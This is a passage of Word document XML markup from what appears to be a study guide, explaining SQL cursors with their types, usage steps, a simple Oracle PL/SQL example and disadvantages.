          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, making them </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>useless overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C1CCA1" w14:textId="02DDF535"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2747A6FD">
          <v:rect id="_x0000_i3026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342D13C" w14:textId="1983BB08" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA35F5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="736" w:name="_Toc196308216"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Cursor</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="736"/>
    </w:p>
    <w:p w14:paraId="056DDA66" w14:textId="6D1E9E9B" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cursor in SQL – Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62603BCA"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cursor</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a database object used to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retrieve, manipulate, and traverse</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>result set</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a query </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>row by row</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2B231" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="76BEF145">
          <v:rect id="_x0000_i3027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DAB44E" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why Use a Cursor?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6843D825"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In SQL, operations are usually set-based (they work on multiple rows at once). But sometimes, you may need to process each row </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>individually</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7EC0B"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Performing </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>row-wise logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B72B5A"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Calling </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stored procedures per row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306EEDE"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Row-by-row computation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> not possible with standard SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0685F4" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="163ADF2D">
          <v:rect id="_x0000_i3028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="714DAA2B" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Types of Curso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8"/>
        <w:gridCol w:w="6909"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w14:paraId="17B17E09" w14:textId="77777777" w:rsidTr="008B7C75">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B862D3B" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758202C7" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w14:paraId="23198EBB" w14:textId="77777777" w:rsidTr="008B7C75">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F3CEEEC"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Implicit Cursor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FA68A6F"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Automatically created by the database for SELECT, INSERT, UPDATE, DELETE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w14:paraId="367398A7" w14:textId="77777777" w:rsidTr="008B7C75">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26855D93"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Explicit Cursor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6563885F"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Manually declared and controlled by the programmer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BB406FA" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6B90859B">
          <v:rect id="_x0000_i3029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C632A" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Steps to Use an Explicit Cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4FA88"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Declare</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BF6B2"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673C27E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the data from the cursor (row-by-row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F90C3D"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A57851E" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2262775B">
          <v:rect id="_x0000_i3030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9AC95C" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example (Oracle PL/SQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B92D4"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ACC8FF"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CURSOR emp_cursor IS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7D3C1"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SELECT employee_id, employee_name FROM employee WHERE department = 'Finance';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417342FE"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v_emp_id   employee.employee_id%TYPE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDDE6BC"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v_emp_name employee.employee_name%TYPE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E9A525"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5271572E"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OPEN emp_cursor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A5846"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LOOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30896A18"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FETCH emp_cursor INTO v_emp_id, v_emp_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B7ED71"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EXIT WHEN emp_cursor%NOTFOUND;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051CCFE9" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D60D88A"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 Process each row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475FF721"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DBMS_OUTPUT.PUT_LINE('ID: ' || v_emp_id || ', Name: ' || v_emp_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47989464"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END LOOP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43818D48"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CLOSE emp_cursor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C15CB89"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E3271" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3689B533">
          <v:rect id="_x0000_i3031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4651F390" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disadvantages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F9C556"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Slower performance (row-by-row is slower than set-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19144EE8" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumes more memory and resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE8E5C" w14:textId="7F7F5B3B"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25245FE3">
          <v:rect id="_x0000_i3032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2764C78F" w14:textId="519F2235" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="008B7C75">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
